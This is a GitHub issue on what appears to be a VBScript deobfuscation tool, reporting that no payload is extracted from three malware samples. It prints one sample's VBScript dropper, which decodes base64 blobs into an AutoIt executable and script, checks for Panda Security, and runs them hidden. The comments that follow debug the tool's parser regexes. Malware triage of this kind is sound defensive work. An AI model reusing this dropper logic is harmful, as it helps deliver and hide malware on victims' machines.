Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

No payload extracted from vbscript #18

Open
harold-ogden-walmart opened this issue Oct 28, 2019 · 2 comments
Open

No payload extracted from vbscript #18

harold-ogden-walmart opened this issue Oct 28, 2019 · 2 comments

Comments

@harold-ogden-walmart
Copy link

df9941c65fb86b53beca439f821c73b8435a0f85a4b70a9a5e317f3f5385279b
d62b0beb27e3b97923f9263a379492bfdf08a3dbcbb16c0af5a86420f5b74012
3dffb392f186abf80646ef2375f8989dbde3beba249ea374deddb690fa77b9a7

Sample payload:

dim FileObject, MSXml2,basee64,tipo,FolderTarget,AutoitName:Set FileObject = CreateObject("Scripting.FileSystemObject"):if FileObject.GetParentFolderName(WScript.ScriptFullName) = "C:\" then:wscript.quit:end if:FolderTarget = "C:\" + RandomString + "\":FileObject.CreateFolder(FolderTarget):AutoitName = RandomString + ".exe":if FileObject.FolderExists("%ALLUSERSPROFILE%\Panda Security") then:AutoitName = "autoit.exe":end if:AutoitScriptName = RandomString + ".au3":Set MSXml2 = CreateObject("MSXml2.DOMDocument"):Set basee64 = MSXml2.createElement("Base64Data"):Set tipo = CreateObject("ADODB.Stream"):basee64.DataType = "bin.base64":tipo.Type = 1:PAZ = replace(PAZ,"KZMiEq",""):basee64.text = PAZ:tipo.Open():tipo.Write basee64.NodeTypedValue:tipo.SaveToFile FolderTarget+AutoitName, 2:tipo.close:Set objFile = FileObject.CreateTextFile(FolderTarget+"pe.bin",True):objFile.Write rGP:objFile.Close:basee64.text = yWi:tipo.Open():tipo.Write basee64.NodeTypedValue:tipo.SaveToFile FolderTarget+AutoitScriptName, 2:tipo.close:CreateObject("Shell.Application").ShellExecute FolderTarget+AutoitName, AutoitScriptName, FolderTarget, "open", 0:Set objFile = FileObject.CreateTextFile(FileObject.GetSpecialFolder(2) + "\test.txt",True):objFile.Write Wscript.ScriptName:objFile.Close:Function RandomString:Dim tmpdata:Randomize:For i = 1 to 8 :tmpdata = tmpdata & Mid("abcdefghijklmnopqrstuvwxyz0123456789", Int((24)*rnd+1),1):Next:RandomString = tmpdata:End Function; C:\scmbrnqn\mthlucts.exe; C:\scmbrnqn\mthlucts.exe klhcrdkv.au3
@malvidin
Copy link

For df9941c65fb86b53beca439f821c73b8435a0f85a4b70a9a5e317f3f5385279b, it doesn't return anything even when the -i/--init entry_point is set to qmZlPQ.

@malvidin
Copy link

malvidin commented Jul 27, 2022
edited
Loading

The issue may be in core/statements.py for simple_statement and simple_statement_restricted. Changing the first line for each to the the following works on a couple samples, but I did not check if it breaks anything.

    NotAny(Regex(r"End[ \t]Sub|End[ \t]Function", flags=re.IGNORECASE))

This works as well:

    NotAny(CaselessKeyword("End") + (CaselessKeyword("Sub") | CaselessKeyword("Function")))

If this is used in vba_collapse_long_lines(vba_code)

return re.sub(r'[ \t]+_[ \t]*(\r\n|\r|\n)[ \t]*', ' ', vba_code)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@malvidin @harold-ogden-walmart